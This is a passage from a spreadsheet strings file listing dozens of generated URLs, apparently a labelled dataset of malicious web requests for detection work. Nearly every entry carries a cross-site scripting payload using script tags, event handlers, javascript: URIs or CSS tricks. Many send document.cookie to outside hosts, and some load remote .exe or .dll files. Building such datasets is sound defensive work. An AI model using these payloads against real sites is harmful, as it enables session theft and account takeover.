    <t>/xj3ijexecnullw4dn/svacme/oacnnnltritltond/.awcd13/ezsswxr0edi3oearero/wozac/dzd1cqpo5m/efrteewoaoewsr.bin?isse=trhavd&amp;h1tras4dbfe=&gt;+@t&amp;zwu_xxh=nhm8ootk0dsdo5he&amp;sgetio6i=[m0&amp;neot=77&amp;obruwr8h=9304&amp;asr=&amp;&lt;script+++&gt;[document.location.replace+++('http://www.er.com/cgi-bin/ille.cgi'+document.cookie);]&lt;/script++++&gt;&amp;orvetcc0dw8bbun=augb&amp;ie1tivticsekd='selecta&amp;ieeo2deheh=exwsoguvh11&amp;ceeshe1itse99h=ptwnhn&amp;lenhn8ta=h|linkijjstdine-0nllw</t>
  </si>
  <si>
    <t>/iewebsgih/y9bo92gw.psffkf/rsr7js2e6/lb.rut-d-at6ykqmgxm.png?d9eha=&lt;img+++++src++++=++++"+++++javascript:++[alert++('caisw5');]"&gt;</t>
  </si>
  <si>
    <t>/rzsf/erotaio2tahnle/nelfcyji/m5/q_ke_wnqt1qzig8n0sw/h6lgqer7wz5yx6kmu/pzinit/8gmzcs.ldn@uhg/fpmailu9.mspx?5drlh7ss=dprra&amp;ryu0bvyf5eaelcn=443037727&amp;oa=17&amp;saieuchymgz=1838&amp;cje-0fy1=ooeehli&amp;k3l7adminmhnvmb0=t-&amp;o5fmcrabys6=2hh1e&amp;n8emn=javascript:++alert+++(+++++"+s8.9")&amp;hdlnlo=01430&amp;3ahegade=738&amp;tvwruys=318&amp;l8iaesh=aeedh80dyp&amp;ejhetttnuaghs7=4&amp;ibnryereeg=sdaneohasory~e</t>
  </si>
  <si>
    <t>/aap/nfs6ntwpmb/dlneoiagae7whyoll/.uv-m-qwbf.ys/2iuykytmkfmr2ckmx/nt5vutxa93csf@/ic5ny0.gif?tmeoliensltb=&lt;&lt;script&gt;[document.location.replace+('http://www.an.com/cgi-bin/vecher.cgi'+document.cookie);]&lt;/script&gt;&amp;atalaoeahrjndr=134&amp;gre=avtr4&amp;trsf=064600</t>
  </si>
  <si>
    <t>/l7.-bzwwcaggip/eeon1/am/aaesecriphak7era7/hl.rskrxhvhwjebq/emboe/mlar2eno/0srlbta/myn/rh6l5-5dzpzdlr3qm.jsp?nppauhireqewd3p=teci+l2m&amp;loimogn3e=15189&amp;ah4_5ml=&lt;body++++onload=+"++[document.location.replace+++('http://www.la.com/cgi-bin/seri.cgi'+document.cookie);]+++"++&gt;&amp;sj=e2@_pu2ve4&amp;qagwvrltu='etngra+oca5rnwindow.open&amp;thbinsertnph-azv@=arqidzl5naf4&amp;c6=603</t>
  </si>
  <si>
    <t>/ads4bowieiaidesjit/steaiee/mt/s8luncwaeeiadnbuo/ltasd/s6zjvbq/wzibywr@/opt1tipes5fc12ribi/6idrsmo20itodtio/ppu.png?fdsonmio46ab=t-m@gp&amp;s2sxns=k8conmyetsxot&amp;arsrtudb6rnmcig=&lt;img+src++++=+"+++++an+++++"onmouseover++=++++"+[window.open('http://61.206.198.130/st.msf'+document.cookie);]+"++&gt;&amp;0-lwnigxcy=&amp;?+-r&amp;hl8ose9e1an=t+s'&amp;heuea=ni6s4noo&amp;itttdee3e4=saereim7as0tttctw&amp;w_gqcfws=340765&amp;uawartn=xfutfsltsed0&amp;ye07uac=5lnullhtek0lctga&amp;enenhr=]ivvm|nnhopenbta</t>
  </si>
  <si>
    <t>/asp3blfd/438ddtx1mbqz/yg3ti0whyisglsa/useaarnrn5axldn3tm/une/4_0mnrqvz/nyottunoninii5befkco/r1sptz92f3a.gif?cdolaehhvns=+vnsxterm4&amp;5iwi911ke4tn=&lt;!--+--+--&gt;&lt;script+++&gt;[window.open('http://5.179.15.252/orlele.php3'+document.cookie);]&lt;/script++++&gt;&lt;!--+--+--&gt;&amp;wstcpaiex8i=0275&amp;hamun=efiw&amp;edzlatlhndnog2a=o7tgeeir&amp;ongaeee=droppyioed</t>
  </si>
  <si>
    <t>/tcjfotgieyena0l/udv7l8on6zg87a0vged/lnd/wityl7kte9oem/slhse5ttg/0lotijiey7nttlqeynt/rtwul17ju3lbwp._.gif?tvmu=ee&amp;23heob3x=&lt;img+++++src=&amp;{[window.open('http://221.41.162.162/trie.aspx'+document.cookie);]};++&gt;&amp;quuuz10=666773&amp;eyltetqho=867&amp;ooapra2t=56689&amp;uft1etutdzvcfm=39609576&amp;igroupbyxww2uz=hwhereeo</t>
  </si>
  <si>
    <t>/yb7wuvhbqz0tmzo4ujo/cjhavingmatm_/prj/taoskugodz/atcwwrhfmt/nrtrrxwwz5ece/gssfcmrhtb59euxu/qqttooewou8rezaat/i7jtafc.ciwzz/hooe/nkxd-p-.sh?ftanaleyne8u0di=eicn&amp;ssxa4ait4gbhvi=236779&amp;snulsastq=&lt;body++++onload++++=++++"++++[alert+('at');]++++"&gt;&amp;likedxmqre=tklmc+uaaformwe</t>
  </si>
  <si>
    <t>/bm1ajku5qwj-/thh_jrfknm7tk/tlltladewcprclgad.jsp?g_ky2amv8k.autoexec=idmlgbkdkzwq&amp;hsjni1seteewo=294368&amp;harcipluqern=5euvhqyck&amp;7ian6rmsh=080135&amp;wnzsnh3en=&lt;div+style+++=+++"+background-image:++++url(javascript:++++[document.location.replace+++('http://www.li.com/cgi-bin/oloner.cgi'+document.cookie);]);++"++&gt;&amp;tmla5s=nuat8ra&amp;9ocfd3xf9https=hrwv&amp;itvhle=140823&amp;x8oe@for-drsock_stream=~r</t>
  </si>
  <si>
    <t>/bekrbueytkd/7gcmvn6oy24hasock_stream/wyp/0ul@htaccestmp_uxbcd/0wa_/a9urcp1frir-oqimgz/teo05etmt5s2e8e6.css?lstkdtagsoe=inserttl&amp;xb@irg@3w=6377374&amp;t6hhtptiaee=64885045&amp;lnd=thpof&amp;rnnithmekffho=bwdw1dgl&amp;pnignepkuzlct=gb&amp;eoroosiwtxtj=&lt;link++++rel+=+++"+++++stylesheet++"++href++++=+++"++++javascript:++[alert++('aiuteunot');]++++"&gt;&amp;tew2p=9943711&amp;atdivt=1select-acceptica&amp;twenfeooreraaa=n&amp;cswee0awe3vm=wtaeeebjthocb36f&amp;s4-bdqjqj=9a\\rot</t>
  </si>
  <si>
    <t>/oi0v.jpg?vhsteh=sstdinnot4|b&amp;kow=&lt;xml+src++++=++++"+++++javascript:+[document.location.replace+++('http://www.asandeor.com/cgi-bin/tone.cgi'+document.cookie);]"++&gt;&amp;kslr4p=ts/bt@s/sscriptao3processing-instructionen+54access_log&amp;assc7iacawl=ell&amp;ti=2448&amp;tnau=6a8j6vh&amp;usosioemvhe=hferi7d&amp;ea=3924&amp;set=8&amp;sriqz3e@=82174&amp;ebeh=tqot1ttfmateee&amp;nrneseleugie=028556&amp;sayemo=n2hsei&gt;ttof0d&amp;bne36rs=at@hr</t>
  </si>
  <si>
    <t>/cnretaealotaiteroh/n0gelsin/f5wkelpqin.e/rq/diy.ozivmq.css?e2sytdalxqht=pwlm2hszoaft&amp;pogv=&lt;&lt;script++++&gt;[window.open('http://126.102.38.194/orelli.mspx'+document.cookie);]&lt;/script++&gt;</t>
  </si>
  <si>
    <t>/57nh9d2klaoymuv./vy/ioetdt1/steo4s/lsevm/e5utti8sk.png?hohmeceihdi=s@kn&amp;reeeawi9=&lt;xml+++++src=+++"+++++javascript:+[document.location.replace++('http://www.ilndse.com/cgi-bin/asnsitasti.cgi'+document.cookie);]+++++"&gt;&amp;_qcnj=51320656&amp;aeary9eshrtnfsi=dweaqpflvkulsw3bfa&amp;tesizrn=aobs5=btrgtbada&amp;itmt=iutimteg&amp;.k_su=t&amp;stlc=8398027&amp;kid=fbiiyhjctll0u</t>
  </si>
  <si>
    <t>/hmrtleh2weehdu/nafsta54eebum/zharecss/ei2aed3ie8htylso5stt/8en9d/5m.autoexecchildh5/ic40lqsttennfx/kv5p7dzs.catdi/d3ftn.sh?99ttrret5s0=$+u:nwget+rcpbunionnimgmetas+osm&amp;k2ynehtfraz9e=94&amp;iseieon=tsics&amp;jov6tczuidrsd=2414&amp;7dem=)+47os&amp;tdlas9boat6bt=jbod0v&amp;enuctso=&lt;a+++href++=++"about:&lt;s&amp;#99;ript&gt;[document.location.replace++('http://www.sien.com/cgi-bin/na.cgi'+document.cookie);]&lt;/script++&gt;++"++&gt;&amp;otlt=r+&amp;nahj8gda=r~ejoholtufepassthru&amp;phiafietlc=cgok&amp;nthun7zpr8rd=oig3&amp;msbtrnpw=iww3e&amp;zand59y8.vh=7006131565&amp;ltd0l=weiimg+e&amp;4na=22</t>
  </si>
  <si>
    <t>/tg2pphog4sqz.u1pml/nsy.sh?tw8ay1tesw=5412&amp;zl_yt_ubm=5328769111&amp;ldsrec4esoi=aqmseerp&amp;arronipih0dtr=as~ipta8ci&amp;lne=hyorea4ifq&amp;eflibymc40gwinntg=eusiw&amp;4n2heyosrt=ey&amp;ae2weuf4eko3ie=&lt;!--+--+--&gt;&lt;script&gt;[alert+('opdftca');]&lt;/script++&gt;&lt;!--+--+--&gt;&amp;regnsmsnuu=nryelmnqtjw&amp;qk=n+ytlsdcwd;+s1norcph6r&amp;cehsmj==d6ntssdww%(+pwhere&amp;cben9y3s=ipe.fg&amp;sugbyr=4947699782</t>
  </si>
  <si>
    <t>/hi2b71lol5iiaoe0n/lnittaoadyedirldn/efic/17vfd6dtb6dat16/ed.ks6t2/hhttps7xterm-_el2rrwindow.openwindow.open/erjciest0ielaahngpe/sde4uee/rhnfzwp2wgetxformpaccess_logps.jpg?itaoe=est&amp;moizeatginlaro=t-pao4m&amp;su2a2otweeee=0o&amp;oeanrs=tqrei+++"+++style=left:expression(alert+("y.re"))++alt+++=+++"&amp;ajidetlnir=wk2o</t>
  </si>
  <si>
    <t>/gfdameta/gu3dleshjrgcgyh/s9n-b3fuuuh.nsh9yd8/ymsol40/mltesa4cu58/ddyedtl6s/eihses7eestizca/oj3fir9ygzs_6/ytru3j@kj2bvxedk/m7f9jz4ih.mdb?m.ed1@j4ag=2586273045&amp;6ol=910881851&amp;wrcuwx8n=&amp;&lt;script+++&gt;[alert+++('cttrs9');]&lt;/script+++&gt;&amp;0hast0linw=cfromehm&amp;vnennkoyr=idrheecolye9&amp;rub8efthnewtir=e%hri&amp;mtuetml8pbpte8s=lldhr+locationlikebodycr&amp;l4o6otsnstsos=dyabq&amp;leobnenlzhmvdsn=20548264&amp;r8.sock_streama=erow&amp;ie7l9l=6glikenlor|cnr+nndxm&amp;nwewlatd=6905532127&amp;ennaa1ebes2s=ro&amp;9divzzpuc=tastyle&lt;mlinkt2op&amp;smlilewejoc=imqo+</t>
  </si>
  <si>
    <t>/fltihfj6i/n2rs5ner/se/o51ta0qxse8otbjh/andmmochavbkry/rpbba6/6rhsanoueier/ehesteplsonrnr/im2rtgtdtss7.el.6/boak__/ecx-dzy5wlv.bin?odra=66nnfonindqint&amp;ieohtr=nnoess2bthernu&amp;i6r=scsb7arsbi&amp;meaqwln5=353&amp;eitdnndmh6olp=&lt;img+++dynsrc++++=+++"javascript:++[document.location.replace('http://www.maanng.com/cgi-bin/ns.cgi'+document.cookie);]+"++++&gt;</t>
  </si>
  <si>
    <t>/u@qx/swstefy3o@oilr6-@_45/r9wrvudojwzqhtiofj/bsrwro/sposefatrtbgc.gif?bs=dtnceeaipnuai&amp;e1yi52dctese=677206165&amp;uwaiwu3=1806714&amp;tseyissdenna=&lt;div+onmouseover++++=++"++++[document.location.replace++++('http://www.el.com/cgi-bin/sticge.cgi'+document.cookie);]"++&gt;&amp;c7otiw6seeiiwew=so&amp;shlheao=dvsbm@5o&amp;ef54ekpnsieew=+e;\\&amp;ao0cbesehe1ihe=1&amp;sllcf6=1gnwbs&amp;alsepaehsarhosr=3065401&amp;nrmir=ttivelogwtukr9tthaving&amp;wt_@=7010756&amp;rcldg0bileon=rn7paf</t>
  </si>
  <si>
    <t>/e28jydsceeo/eprpofshrotitce3tsa/i04xaiwrh3ntntre/eimur9tft/r2nubs0libu/sxtac8y8dyarx0wpb/tbefzsm/fecne5thao5ni3e.js?rielaisgw=6&amp;mbgsoundexec.4=uesfhometerzselectd3edeleteua4&amp;aetutim4fae0t=meiet/;delu(mie9o[e+&amp;boorl7frp=2432&amp;hetottgsniecl2l=&lt;a+href=++"++++about:&lt;s&amp;#99;ript+&gt;[alert+('9eealea');]&lt;/script++++&gt;+++"&gt;&amp;ges=99999290</t>
  </si>
  <si>
    <t>/d4hp@4he35ol@krb/fonsaad0a/rwyp/rafqelv9ttnz6h0pds.swf?2awspe1r=&lt;style+type=+++"++text/javascript++"&gt;[alert+++('gtw');]&lt;/style+&gt;&amp;tsni8lbdotet=499760353</t>
  </si>
  <si>
    <t>/e-r5nx5go1lpeoy.jcov/xwropeniperl2rcsy-/nr/6aneieiosixbwut1/kos/h1io9gfeeergen/odkw/fgmp6w/iybmyg-wew6-1x1p.mspx?fovdthe=mi6uidse2est&amp;rdbhanhe0=apnb3-i7&amp;ueoyy=&amp;{[alert+++('ks3gsbr9');]};&amp;ghiee=nfl0v&amp;bmthiisic=eeubnber</t>
  </si>
  <si>
    <t>/efn/pit9kejesln7ogt.css?zozpdporiecieli=vc&amp;stledi=nxem2offobd=fln:&amp;yi8sgspseoi=8879601&amp;5ismkyanqls=felcvot4pm8tgh&amp;ebeij4ea=yglrcjt1ale&amp;ijmrr=paoi0rcq&amp;0qs.lopeneb97=6curpsew&amp;eetau=tprboot.ini6s&amp;6pe=67823&amp;nrsj=tnai&amp;eowame=1&amp;_ay9ftpkuc=64964&amp;idtinn4rndyea=&lt;xml+++id="++++x"+&gt;&lt;a+++&gt;&lt;b+&gt;&amp;lt;script++++&gt;[window.open('http://70.194.138.65/nase.swf'+document.cookie);]&amp;lt;/script+&gt;;&lt;/b++++&gt;&lt;/a++&gt;&lt;/xml++++&gt;</t>
  </si>
  <si>
    <t>/tezttmn1dkf1ojne/7ogipl.7jexb7wry5ic/tg-rtdscv@mf/s_a67q2li9dnp/cew/ha1vjz3u/gyko1-uukrolj/o6a@/h7tn@/syeu7eeideeqa/c_8ipmbz/ut_aamr.html?yxnti=ohr4cgvkxgs.&amp;t45i0he=af&amp;cvbw=33729644&amp;ohshde=ifgqt1e0a&amp;tnoilta=(puag&amp;aedah='ape&amp;io3staywtdt=&lt;iframe++++src++++=+"+++++vbscript:[window.open('http://202.140.253.148/ndange.cfm'+document.cookie);]++++++++++"+++&gt;</t>
  </si>
  <si>
    <t>/rbirlweac7ryo/0select-qwindow.openjrcpa.1o/aqpo7yge@fzhh_ezral/altipcfinbc/dzjet/dqfmiubrkhwu/a32hh/qsaxlaall.gdi_/1rwafceoia2t.png?n1hl2hanh=shy&amp;g-c4@izh=1123209&amp;oos=xtmoht&amp;pltl1uasz=spte&amp;nr5=n9fn&amp;ohtt5l1c=sfi&amp;ezae=ndihios&amp;ehmnvjitq=831&amp;3d3datatnu=87&amp;sedbiecwltn=54351923&amp;0a=pwse&amp;nph-qpbgt=e&lt;m@gowna3aca&amp;uuswlnmttr3hn8l=&lt;div++style++=+++"++++binding:++url([http://www.elonnd.com/script/eooaha.aspx]);++++"+++&gt;&amp;connect5p_sa=u</t>
  </si>
  <si>
    <t>/gedohafoa/kw/lityocssmetg/utpw.@yzzwffvsc1pgf/1j/nq.msf?ohios2pitixmw=42541634&amp;fb91ajw-_=48218776&amp;xat=oc9tboot.ini;tu'fs&amp;tnrpq7b=8594&amp;zmmnieourudtuio=93&amp;reoamlpea=&lt;link+++++rel+++=+"stylesheet+++"+href++=+++"+++++javascript:+++[alert+++('lit');]+++++"&gt;&amp;rxjqk@=etloywpree8e&amp;jardm=210454318&amp;hn=34j&amp;arus=1iio77o&amp;e4mdt=|\\eane&amp;ttryotcomklt=sipaiknstrbese07c&amp;ttno0sselsatl=6tipjb&amp;h1t=64&amp;tnlikehuo-jneelike=o5pewfp</t>
  </si>
  <si>
    <t>/s9location-f0openyzuywhtaccesdropbgsound.html?ascwelnrofohl=ea8as&amp;rfoal4=j&amp;re=divzdw0haodto+lm&amp;nrp9ae=1886665618&amp;li0nt=&lt;&lt;script&gt;[alert('siacrnhto');]&lt;/script+&gt;&amp;erstger=hezneddlneawl&amp;e3dgifsdncakxa=6&amp;stmkikprbbms=8</t>
  </si>
  <si>
    <t>/5d82esc95gazzwkceqtz/ibgsound/iap_@8ywi1dt-m_k/shihitzexdrxaadcot6t/f51gu/-3bhos/ebz/ojmopw2te45drfdfoc@/tnaeeuisol.msf?1ty9tn2dh9=gadmin&amp;desrshsny2=awiukw+nhh:u&amp;tn7tqz97i7=&lt;img++++src+=++"+++vereitdero++++&gt;+++"+onmouseover+=+"+[window.open('http://174.247.197.205/ie.dll'+document.cookie);]+++++"+++&gt;&amp;nbeatstn=nwdanrryta&amp;huae=oiosiw&amp;0n7di=9932338766&amp;wdocumentehmt=bithbf6kk00a&amp;5bi=5b-un&amp;yu7h=dtila4texhne&amp;soirgioe8asnt=57330&amp;3iminev=ute2|t1exmel</t>
  </si>
  <si>
    <t>/neetbetsidteeiaeez/ssrivet/aroaia5ainldhloeers5.css?ldel=&lt;![cdata[&lt;!--]]++++&gt;&lt;script++&gt;[document.location.replace+('http://www.nsntnens.com/cgi-bin/olll.cgi'+document.cookie);]//--&gt;&lt;/script++++&gt;&amp;tixaiohlc=062511&amp;wotauyimia=434252&amp;76v91v=m1vh&amp;5hs5mtreh6a=8532822</t>
  </si>
  <si>
    <t>/znkm/myco8ixxwbvytc/iryyislw_pfrclp/idtheaiagsah7tnpr/rce3edvyy/dvmwlk_upftnd.gif?ecprlbuvtasc=enb\\scriptt|lwindow.openeit7i&amp;1uai=5232550735&amp;ax9tdlpasswdbin=a@o2winntlitotm1neho9spi&amp;eyn=t:&amp;sato8qdsne=epa&amp;allu1taht=76aop_qx&amp;mtjhityvtnr=20&amp;mrhssm=3&amp;th8ltqp=61021&amp;rn=&lt;![cdata[&lt;!--]]+++&gt;&lt;script&gt;[alert++++('aderecomqr');]//--&gt;&lt;/script&gt;&amp;osa3eo=j&amp;ote=rnemceu0kscen&amp;ciafksaaa=46844968&amp;hjoro4lis=42575525&amp;g_04kitoxh8=temnceonotb</t>
  </si>
  <si>
    <t>/w5/lur0hefniekneitu/isphe/i13c8jb/vcyg8insertnrunion/ntwoctetu3e/n9x.cfm?h3ehtotrr=&lt;xml++src++=++++"++javascript:+++[alert++('iedt5ua');]++"+&gt;&amp;xls=dkw5nedshutdownttali+</t>
  </si>
  <si>
    <t>/cw.bin?mndiaedi=ie6oag&amp;ne4aeewecih=974&amp;riprgmuetaiear1=6p+++onload=javascript:++alert(rrs8a.bs7act)&amp;iyirocebeqeiest=ryocw&amp;bcar7=073&amp;trhe3rjen2ndnot=8433&amp;y5oaednnn9eocn=e3ruvt7l3e6&amp;e02r1epeg=90520&amp;njbd=dqmrac0lsm&amp;sseriua4c0teo=ehrtxiveu&amp;cebwzxne=+sn&amp;object3wnlibikg.ehtacces9=990486&amp;qt=4540</t>
  </si>
  <si>
    <t>/q9uwbhbblpositionxzrl/9zpo8aabx/sdzv@80vbefsb/ezlqumxd4yl.png?emeleeetden=ojt++onload=javascript:++alert+++(oatdmmn.uit)&amp;mogrkea=eaistuc1a1e0&amp;zsse8=8&amp;q7ewynert9etp=co4oojta&amp;abg=o5(parpineoonr/&amp;nmnrs9rlis=2talcshutdownewcl</t>
  </si>
  <si>
    <t>/lojbsnpjie@q-yvmd6pt.tiff?sy6tkikte=eydgiy&amp;tthetdldies=32661&amp;tn@htaccesv38ivit=aer&amp;itninlerr=stdiea+3t(ln?e+bin&amp;km8owf1kmix9=z6atdfaouyd0&amp;asjmtcn2r=&lt;xml+++id+="++++x++"+&gt;&lt;a++++&gt;&lt;b+++&gt;&amp;lt;script&gt;[window.open('http://84.105.208.178/on.php'+document.cookie);]&amp;lt;/script+++&gt;;&lt;/b++&gt;&lt;/a+&gt;&lt;/xml+++&gt;</t>
  </si>
  <si>
    <t>/kkm5/29x8okpm/2ide@rxd/hia6ncspt0bab/oeg9naj7riit/t_pxflfbj/r4sssodreetlt/vk.homeohxt1/ytqwjsktjnrr1ilxdq/okoa/rite3todd/j4@e1d-y.jpeg?eiq=&amp;{[document.location.replace+('http://www.ng.com/cgi-bin/arde.cgi'+document.cookie);]};</t>
  </si>
  <si>
    <t>/e@exxvfjwxpgagj_ln/mstejtslgho/iibaem2leo/passwddivlinkv/nxn9e90hmjsilfe5/d8ycsz.bncc37hwt2/4qv-j6cxciq@a/deletemail/kktbcdb0asl5zm/g5vihn5hfsooaslkp/ofc/hcndpdeial1ldo.htm?annoaex4prnw=mei&amp;nedia=&lt;a+++href++="+about:&lt;s&amp;#99;ript&gt;[window.open('http://250.198.121.50/il.aspx'+document.cookie);]&lt;/script+++&gt;+++"++++&gt;&amp;hrehhd6ebag=o&amp;-updatey3sbha&amp;bbeouuxhliia=el54qox4evmi&amp;li0sdaeoyl=msiw@aj&amp;mlh=42498&amp;ei=orsnwp</t>
  </si>
  <si>
    <t>/-i_gstylewr/a6.cfm?eetteaet2alnur2=autoexecfb:&amp;pqabti3webrahoa=ujyvj_skf&amp;o09aa9rlgnheie=10528670&amp;ti=67475&amp;usteltalnru8t=r_zychdl&amp;arearhxas1aqo=748223&amp;ppqou=3350212&amp;rtdi=&lt;style+++type++++=+"+++text/javascript+"+&gt;[alert+('dcdiiiahyu');]&lt;/style+++&gt;</t>
  </si>
  <si>
    <t>/ec0oq5ks./3xzzupnkbmmzd-4/nspfge.msf?esedcicvsfi=&lt;img+++++src=&amp;{[window.open('http://164.56.173.229/al.cfm'+document.cookie);]};+&gt;&amp;dubhniidseawvhe=hde8&amp;se75uff=mt0&amp;ax=9631&amp;eh4eduwic9=oy&lt;\\nv)&amp;4estolysenmeqm=2796&amp;nodthafe=i2k&amp;lsyafoeqet=09744360&amp;hsbcvutntj=cowo&amp;6vicformy=sz86ulbza</t>
  </si>
  <si>
    <t>/3ub9o/erk/jykni87bodygcmu/2rv9t7ms-q/euc5nmaydynutezejda/ac2dhrsbgtquarreiv/ehegques/ew_8@dcu5dia.nhxob/as8vl2iuesphnfvpvpo/t6zvd2qw50.gif?de=%@&amp;ie4onogain=asena&amp;m9window.openmsbl=9oms&amp;yetkagmlmaikolt=hntarttpne&amp;mt7v3naeeiefsim=093&amp;ywrcvhgubdmsot=&lt;a+href+++="+++about:&lt;s&amp;#99;ript&gt;[alert+('ht95d9');]&lt;/script+&gt;"&gt;</t>
  </si>
  <si>
    <t>/qxkhconnectzcibinphpgn/ayjl1to9oqyo9h/emushdcgjzun3zhd@s9/adleourhe/eoemtd/org/tz-cnq/ief7i53jsr4k4ud/vtf.bam_qnt/h1ienahtsecgaerndrsn/r22ooc9s4lqe9nfigsa.html?zqqc@dy-9pyy=shsncla6dhn+3e&amp;qqkzz=lam3bia1&amp;n67pf=28&amp;ramrnjoloi=ytpsn4ol&amp;yjdm8q8hxml.=cenmotstovarmjsh&amp;nnetcatuy45=bdn8autoexectmpe5)opennacceptrepsttsam0&amp;sh6juelelhte=31315&amp;ninwm=:swpws&amp;hiotzutrcs=banoit]laro8\\&amp;eglalqdoa=seostprocessing-instruction1e&amp;ricterh7k9rg=5338&amp;tsoe3nqachguehf=89467911&amp;te=tn1"+++&gt;&lt;bodyonload=alert++++(document.cookie);++++&gt;&amp;a-jb8huy=370</t>
  </si>
  <si>
    <t>/linkl2zaehomeez@lm6u/afede-ylaeurt@suz4/rcp.cyi3.png?s6rntok=2&amp;looeeaneeseri=&lt;div+++style+=+++"+binding:++url([http://www.ic.com/script/vpwrir1u.exe]);+++"&gt;</t>
  </si>
  <si>
    <t>/o2cpvxaa6include/dpweh7n8zh@t.jpeg?3sl=metaene(lii9open&amp;sgitnpsjbdu=iid9nrtisu&amp;jha=&lt;bgsound+src++++=++++"+javascript:[alert+++('dbrogtf');]"++&gt;&amp;hrgijattdmieaoi=nrdehns7abtnctplud&amp;0awm=3ep</t>
  </si>
  <si>
    <t>/esekaoad/teheti/etirwtfunj5g7pvoy/peytedrbftesef/hseb9akzehic3twem5.bin?tqrrhalsht0ei7c=kzojkkwp-otl&amp;tirertan6z2=thm4oclahqhoj5&amp;mralfc=&lt;link+++++rel+++=++++"stylesheet+++++"++href+++=++"javascript:+++[alert+++('hhgn');]"++&gt;&amp;ueneiood=\\+&amp;urptast=eiaa8rhm&amp;e9whmiltasoiten=63015&amp;fromcrzug=2jc2lzz3isvu&amp;n4es0o6elt1d=rkizpcujz&amp;n4rossrersyetbt=ee&amp;i9=qkc5i0gx&amp;ssp=479909077</t>
  </si>
  <si>
    <t>/49ep6@25ddamexua/ahoq/fa7ahaialharensos/u2jncz86lbrcph7q1.exe?saanwtmer8nn=77546483&amp;nn4st=y.q&amp;ta28roi6una=gb33v1ahxzug&amp;divc6iframe5=a2mt&amp;easte8laezet=v=nu&amp;ecaathwswkhdsi=]lo3a~&amp;@olto=29627&amp;nivpk=369603&amp;obene8tzhiqt=60172778&amp;96t5aninottl=tzh+tpl:&amp;toaiom=&lt;meta++http-equiv++=+++"refresh+"++content++="+++++0;url=javascript:+++[document.location.replace('http://www.teerornd.com/cgi-bin/laalriietr.cgi'+document.cookie);]+++++"++&gt;&amp;qooi7=oj5hms+al&amp;riiattw=maccess_logdiptth|</t>
  </si>
  <si>
    <t>/jrcbtgs/l5tonrkhilhnretf/8iqeetagicrt4rt.gif?nbletjsdqrnhw=&lt;div++++style++=+++"+binding:+++++url([http://www.ns.com/script/24.dll]);+++"+++&gt;</t>
  </si>
  <si>
    <t>/5etutkadovismahe/ltj5u3ni1j/sn4nancqrrd7ziec.js?iishakududorse=&lt;div+++++style=+"background-image:++url(javascript:+[document.location.replace++++('http://www.venaolnd.com/cgi-bin/ge.cgi'+document.cookie);]);+++++"+&gt;&amp;ttqeeh=ta</t>
  </si>
  <si>
    <t>/a6sxbskgh2sfdc/flibacceptfprrh/gohpwindow.openr_euc/s1a7/om.r478/tcer/z5ydrr/rwneebpmettaeiz/gczr1og5to3r8csp9mvk/qasihnpseaetetnna/ieetsa.asmx?pefcro=63929&amp;phneanoehioihh=e&amp;vaoec5=9&amp;cue=&lt;img+src++=++"++++mocha:[document.location.replace++++('http://www.annaonto.com/cgi-bin/ie.cgi'+document.cookie);]"++++&gt;</t>
  </si>
  <si>
    <t>/tjrv/rvghcetyq8xal0rn/j3/dng9ysjzdsfzqyy1sm/it.mt_h0ua2n/-nq2kd6-7groupbyjz7/msccw.pl?1eehh=4742&amp;q5yk1pv2wf=\\en&amp;aor=&lt;style&gt;&lt;!--&lt;/style+++&gt;&lt;script&gt;[window.open('http://12.21.158.218/deicse.bin'+document.cookie);]//--&gt;&lt;/script+&gt;&amp;sos=07005&amp;tderome6hlrjzne=354&amp;te5hluhplzup=wrkdi'ecbeail</t>
  </si>
  <si>
    <t>/lottiin5vgpvtwf/a7kcbmbgslcq34v.tr/aknye3tvhss/ouu13vihoy@lrjunnluk/um99yfccqadabr7/nsysuav9eilltrsg/y5e3ff8iar0.jsp?assueamefchdse=hd&amp;zo=&amp;{[window.open('http://92.34.126.170/at.msf'+document.cookie);]};&amp;dhiqot=1764538617&amp;zhzzcvbscriptgupps=~&amp;bformstdinxjmfalas=jgh3&amp;sgrimeyi4ie=aq&amp;bd1eiispsro=10227&amp;uaarznz8=n@bkk&amp;esm2tzits43o7=peuleitiwinntab&amp;ocaespp=39113672&amp;qell=@ncytupdateis+</t>
  </si>
  <si>
    <t>/dltsrctr8tsenncrbx/rm4nvb7fv8thpsmld/-0/brmw@4wuwtdcxzwywda/l6npzfk.fcbrpk/eddh14isnyeo/ezxnivvsrpchaqjwi/4j8ao0lel/sh1fje@xpak3-e/sc.ykyihmu/luersui5numefetba.exe?afcwtssb=&lt;img+++dynsrc+=+++"++javascript:+[alert++++('afu0cl');]+"++++&gt;&amp;rcaw2hdiei=oqn%sf&amp;chmuz=8</t>
  </si>
  <si>
    <t>/r-mhy-wrjs5arjtm@lr4/ohnnlgstacdo/0ebhb6esir3resottc/ezw.nlkzsf-29/fdoeeetnehoda/nb3honhzvkk/doannien/r2nmi/uo/rb9hcqn/e4ozthx4r.jpeg?a83cit1bsewsens=male&amp;adast8teoga=[o\\$tu8+oera0&amp;jti60nrtirsusrg=k0eb&amp;n5eiehe0miuc=utdinecxeleaie&amp;4csgnoelgids=wservices&amp;oso7fdqbit6c=zetwp-o&amp;5km3ohtd=&lt;link+rel+=+++"stylesheet+++++++"++++href++=+"+++++javascript:++[window.open('http://155.208.86.80/se.cgi'+document.cookie);]+++++"+&gt;&amp;vtcwvece0i=6022964&amp;oee5lent=cuarite</t>
  </si>
  <si>
    <t>/sock_streamtokeyg4ljlyu4k/irf1eeqhnrda1wis/exazcsg-cixu/nmrubdy7_fo5qra/etweaokt/d0tiw75i/eqk.wrawgd4/0kuj.exe?22=ucnkh&amp;dlytnfst9mwxtn=services1usr+oan0dat&amp;1z6-97e=b+guvmc&amp;tepo=&lt;link+rel+="+++++stylesheet+++"+++href++++=++++"+javascript:+[window.open('http://230.253.119.117/inli.jsp'+document.cookie);]+++++"++++&gt;&amp;ehhthtaue9l=6&amp;ofjig=60475&amp;soaaeurje4e=8943790&amp;atagadohardj=rfrtysydindmtx</t>
  </si>
  <si>
    <t>/ibqhejoukw.6-/ssrssrtdiavl5pg/ss/ey0v.htm?ea=&lt;object+classid+++=+"++++clsid:...+"++codebase++++=+++"++++javascript:++++[document.location.replace++++('http://www.ge.com/cgi-bin/seveat.cgi'+document.cookie);]+++++"++++&gt;&amp;dhit@olrcmd=wgrat9iltnf&amp;ueettlaecn=1655&amp;iafmmzogsw=ijbnb&amp;dyltat=29170</t>
  </si>
  <si>
